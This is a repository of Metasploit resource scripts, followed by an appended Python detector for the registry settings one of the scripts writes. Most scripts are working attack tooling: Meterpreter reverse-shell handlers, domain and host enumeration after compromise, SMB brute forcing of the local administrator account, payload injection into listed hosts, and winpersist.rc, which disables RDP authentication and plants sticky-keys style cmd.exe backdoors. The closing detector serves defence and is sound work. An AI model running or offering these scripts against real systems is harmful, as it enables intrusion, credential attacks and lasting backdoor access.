├── LICENSE
├── README.md
├── bounce.rc
├── bouncessl.rc
├── infogather.rc
├── intel.rc
├── local500.rc
├── msfconsole.rc
└── winpersist.rc

/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2017, Jeff Dimmock
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.

* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

* Neither the name of the copyright holder nor the names of its
  contributors may be used to endorse or promote products derived from
  this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Metasploit-Resource-Scripts
A repo for any Metasploit resource scripts that I've found useful

## bounce.rc
Restarts a multi/handler listener for TCP.

## bouncessl.rc
Restarts a multi/handler listener for HTTPS.

## infogather.rc
Runs a few intel-gathering commands. Can be used as the autorunscript option.

## intel.rc
Quickly runs a bulky intel-gathering script via the Windows command line.

## local500.rc
Quickly sets options for brute forcing the local 500 account's password.

## msfconsole.rc
Sets logging, prompt, and initial handler info for msfconsole on launch.

## winpersist.rc
Sets four Windows RDP backdoor persistence mechanisms (sticky keys, etc).

--------------------------------------------------------------------------------
/bounce.rc:
--------------------------------------------------------------------------------
```
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost X.X.X.X
set lport YYY
set exitonsession false
set enablestageencoding true
set autorunscript migrate -f
jobs -K
exploit -j -z
use exploit/windows/smb/psexec
```

--------------------------------------------------------------------------------
/bouncessl.rc:
--------------------------------------------------------------------------------
```
use multi/handler
jobs -K
set payload windows/meterpreter/reverse_https
set exitonsession false
set lhost 0.0.0.0
set lport 443
set enablestageencoding true
set autorunscript migrate -f
exploit -j -z
```

--------------------------------------------------------------------------------
/infogather.rc:
--------------------------------------------------------------------------------
```
run migrate -f
screenshot -v false
ps
ipconfig
sysinfo
run post/windows/gather/enum_shares
run post/windows/gather/enum_domain_group_users group="Domain Admins"
run post/windows/gather/checkvm
screenshot -v false
background
```

--------------------------------------------------------------------------------
/intel.rc:
--------------------------------------------------------------------------------
```
shell
net group "Domain Admins" /domain & net group "Domain Controllers" /domain & net accounts /domain & net localgroup "Administrators" & net users & net use & whoami /all & arp -a & netstat -a -n -p tcp | find "LISTEN"
```

--------------------------------------------------------------------------------
/local500.rc:
--------------------------------------------------------------------------------
```
use auxiliary/scanner/smb/smb_login
set smbuser administrator
set smbdomain WORKGROUP
set PASS_FILE
echo "Set RHOSTS and exploit!"
```

--------------------------------------------------------------------------------
/msfconsole.rc:
--------------------------------------------------------------------------------
```
spool /mylog.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
set prompt %T S:%S J:%J
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost X.X.X.X
set lport YYY
set exitonsession false
set enablestageencoding true
set autorunscript multi_console_command.rb -rc /autosploit
exploit -j -z
use post/windows/manage/multi_meterpreter_inject
set iplist X.X.X.X;X.X.X.X
set lport YYY
jobs
```

--------------------------------------------------------------------------------
/winpersist.rc:
--------------------------------------------------------------------------------
```
use auxiliary/admin/smb/psexec_command
set command 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
```
--------------------------------------------------------------------------------
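The four registry writes in winpersist.rc leave a footprint a defender can audit for: an Image File Execution Options `Debugger` value on an accessibility binary that can be launched from the logon screen, and `UserAuthentication` set to `0` on the RDP-Tcp listener (which turns off Network Level Authentication). The following detector is an added example, not code from this repo: it parses constructed `reg query /s`-style output and flags exactly those settings. It goes slightly beyond the script by checking the wider set of accessibility binaries (`osk.exe`, `Magnify.exe`, `Narrator.exe`, `AtBroker.exe`) in addition to the three the script touches; that list, the `Finding` type and the sample export are the author's assumptions.

```python
"""Audit `reg query /s`-style output for the persistence settings that
winpersist.rc writes.  Added defensive example; not part of the repo.

Flags:
  1. An IFEO "Debugger" value on an accessibility binary: Windows then
     launches the named debugger (here cmd.exe) in place of the binary,
     including from the pre-logon screen.
  2. RDP-Tcp UserAuthentication = 0, i.e. Network Level Authentication
     disabled, so the logon screen is reachable before credentials.
"""
import re
from dataclasses import dataclass

IFEO_KEY = r"\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
RDP_KEY = r"\Control\Terminal Server\WinStations\RDP-Tcp"

# Accessibility binaries launchable from the logon screen.  The three the
# resource script sets plus the rest of the usual set (assumption: this list
# is the example author's, not the repo's).
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "displayswitch.exe", "osk.exe",
    "magnify.exe", "narrator.exe", "atbroker.exe",
}


@dataclass(frozen=True)
class Finding:
    key: str
    value: str
    data: str
    reason: str


def parse_reg_query(text):
    """Yield (key, value_name, type, data) tuples from `reg query /s` output.

    Key lines start at column 0 with HKEY_; value lines are indented and
    separate name / type / data with runs of spaces, so we split on two or
    more spaces and keep data (which may contain single spaces) intact.
    """
    key = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        if key is None:
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) != 3:
            continue
        name, vtype, data = parts
        yield key, name, vtype, data


def audit(text):
    """Return a list of Findings for the two persistence settings."""
    findings = []
    for key, name, _vtype, data in parse_reg_query(text):
        lower_key = key.lower()
        if IFEO_KEY.lower() in lower_key and name.lower() == "debugger":
            # Last path component of the IFEO key is the hijacked image name.
            target = key.rsplit("\\", 1)[-1].lower()
            if target in ACCESSIBILITY_BINARIES:
                findings.append(Finding(
                    key, name, data,
                    f"IFEO Debugger hijack of accessibility binary {target}"))
        elif lower_key.endswith(RDP_KEY.lower()) and name.lower() == "userauthentication":
            if data.strip().lower() in ("0x0", "0"):
                findings.append(Finding(
                    key, name, data, "RDP Network Level Authentication disabled"))
    return findings


# Constructed sample export: what `reg query ... /s` would print on a host
# after winpersist.rc ran, plus two benign values that must not be flagged.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
    DisableExceptionChainValidation    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x0
    PortNumber    REG_DWORD    0xd3d
"""

# Constructed clean export: NLA on, no Debugger values.
CLEAN_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x1
    PortNumber    REG_DWORD    0xd3d
"""

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f.reason}: {f.key} [{f.value} = {f.data}]")
```

On a live host the input would come from `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /s` and the RDP-Tcp key; the parser only assumes the column layout `reg query` prints, so the same function also works on output collected by a remote collection job.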